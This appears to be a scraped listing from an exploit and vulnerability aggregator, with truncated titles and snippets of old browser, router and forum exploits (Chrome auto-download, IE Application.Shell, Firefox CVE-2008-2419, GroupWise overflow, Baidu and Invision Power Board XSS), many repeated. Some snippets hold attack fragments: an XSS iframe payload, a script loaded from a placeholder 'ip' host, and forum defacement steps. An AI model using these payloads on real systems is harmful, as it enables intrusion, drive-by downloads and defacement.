Sagem Routers [email protected] Remote CSRF Exploit (dhcp hostname attack)

Exploit for hardware platform in category remote exploits ============================================================= Sagem Routers email protected Remote CSRF Exploit dhcp hostname attack ============================================================= !/usr/bin/env python OOO OOO OO OOO O O O O ...

Google Chrome Browser 0.2.149.27 Automatic File Download Exploit

No description provided by source. Author: nerex E-mail: nerexatlivedotcom Google's new Web browser Chrome allows files e.g., executables to be automatically downloaded to the user's computer without any user prompt. This proof-of-concept was created for educational purposes only. Use the code it...

google-download1.txt

Google Chrome Auto Download and Rapid Download By IMC GrahamPhisher Shoutz IMC Tully IMC EXE Shouts To Everyone On The Forums InsaneMasterminds.com To have a file automatically start downloading through google chrome without the users permission is very easy, simple inject the meta refresh tag in...

Automatic File Download vulnerability in Google Chrome

Здравствуйте 3APA3A! Сообщаю вам об Automatic File Download уязвимости в браузере Google Chrome. Недавно была обнаружена уязвимость в браузере Chrome связанная с тегом iframe, позволяющая загружать произвольные файлы, в том числе exe, без предварительного уведомления пользователя. Для данной...

Baidu cross-site vulnerability 0 8 2 8-vulnerability warning-the black bar safety net

http://zhangmen.baidu.com/addprom.jsp?topic="scriptalert/hello! iambadwolf,www.winshell.cn//scriptiframe%20name="I1"%20src="http://www.winshell.cn/"/iframe...

Microsoft IE 5.01/5.5 DHTMLED远程文件读取漏洞

Microsoft IE 5.5/5.01中DHTMLED（动态HTML编辑控制）部分的实现存在安全问题。可能允许 一个恶意站点非法读取远程客户主机上的已知文件的内容。这种攻击也可以通过发送HTML格式的 邮件给那些使用Outlook的用户来实现。 动态HTML编辑控制是一种让IE具有WYSIWYG HTML编辑器功能的机制。然而DOM安全模型没有正确 处理通过DHTMLED来使用IFRAME的情况，导致IFRAME的内容可以被重定向到某个web server IFRAME可以被设置为从已知的本地文件读取。下面是一个例子代码： dh.DOM.all.I1.focus;...

Unfixed XSS vulnerability at www.simess.com

Security researcher Uber0n, has submitted on 16/07/2008 a cross-site-scripting XSS vulnerability affecting www.simess.com, which at the time of submission ranked 6466133 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 10/11/2008. It is currentl...

MS Internet Explorer Remote Application.Shell Exploit

No description provided by source. html body script language="Javascript" function InjectedDuringRedirection showModalDialog'md.htm',window,"dialogTop:-10000;dialogLeft:-10000;dialogHeight:1; dialogWidth:1;".location="vbscript:"SCRIPT SRC='http://ip/shellscriptloader.js'/script""; /script...

Design/Logic Flaw

Mozilla Firefox 2.0.0.14 allows remote attackers to cause a denial of service heap corruption and application crash or possibly execute arbitrary code by triggering an error condition during certain Iframe operations between a JSframe write and a JSframe close, as demonstrated by an error in...

CVE-2008-2419

Mozilla Firefox 2.0.0.14 allows remote attackers to cause a denial of service heap corruption and application crash or possibly execute arbitrary code by triggering an error condition during certain Iframe operations between a JSframe write and a JSframe close, as demonstrated by an error in...

CVE-2008-2419

Mozilla Firefox 2.0.0.14 allows remote attackers to cause a denial of service heap corruption and application crash or possibly execute arbitrary code by triggering an error condition during certain Iframe operations between a JSframe write and a JSframe close, as demonstrated by an error in...

CVE-2008-2419

The vulnerability CVE-2008-2419 affects Mozilla Firefox 2.0.0.14 . It arises from an error condition during certain Iframe operations between a JSframe write and a JSframe close , which can cause heap corruption and an application crash and may allow remote arbitrary code execution . Reported imp...

PHPFreeForum <= 1.0 RC2 Remote XSS Vulnerability

========================================================== PHPFreeForum = 1.0 RC2 Remote XSS Vulnerability ========================================================== AUTHOR : CWH Underground DATE : 21 May 2008 SITE : www.citec.us APPLICATION : PHPFreeForum VERSION : 1.0 RC2 VENDOR :...

Mozilla Firefox 2.0.0.14 - JSframe Heap Corruption Denial of Service

source: https://www.securityfocus.com/bid/29318/info Mozilla Firefox is prone to a remote denial-of-service vulnerability when running certain JavaScript commands on empty applets in an iframe. Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service...

Groupwise 7.0 - 'mailto: scheme' Buffer Overflow (PoC)

PRODUCT: GroupWise 7.0 OS: Windows Xp The scheme "mailto" is vulnerable if one takes as default mail client to GroupWise, the fault is to implement the scheme followed by an extensive argument and this causes the buffer overflow. This brings the consequence that can overwrite the EIP and is able ...

GroupWise 7.0 (mailto: scheme) Buffer Overflow PoC

Exploit for unknown platform in category dos / poc ================================================== GroupWise 7.0 mailto: scheme Buffer Overflow PoC ================================================== PRODUCT: GroupWise 7.0 OS: Windows Xp The scheme "mailto" is vulnerable if one takes as default...

Groupwise 7.0 - mailto: scheme Buffer Overflow (PoC)

Groupwise 7.0 - mailto: scheme Buffer Overflow PoC PRODUCT: GroupWise 7.0 OS: Windows Xp The scheme "mailto" is vulnerable if one takes as default mail client to GroupWise, the fault is to implement the scheme followed by an extensive argument and this causes the buffer overflow. This brings the...

GroupWise 7.0 mailto: scheme buffer overflow

PRODUCT: GroupWise 7.0 OS: Windows Xp The scheme "mailto" is vulnerable if one takes as default mail client to GroupWise, the fault is to implement the scheme followed by an extensive argument and this causes the buffer overflow. This brings the consequence that can overwrite the EIP and is able ...

Malicious Website - Embedded Iframe Detection

Binary data 4470.prm...

ipb23x-xss.txt

Tested On: http://www.abarjigs.com/forum/ Effected on:Invision Power Board 1.REG WITH VICTIM FORUM 2.GO TO USER CONTROL PANEL 3.EDIT YOUR SIGNATURE ByTHIS CODE Code: Select all HACKED BY YOUR-NAME 4.AFTER THAT U WILL SEE ALL THE PAGE IS COVERED BY YOUR PAGE 5.GO ANY TOPIC AND POST ANYTHING. 6.AFT...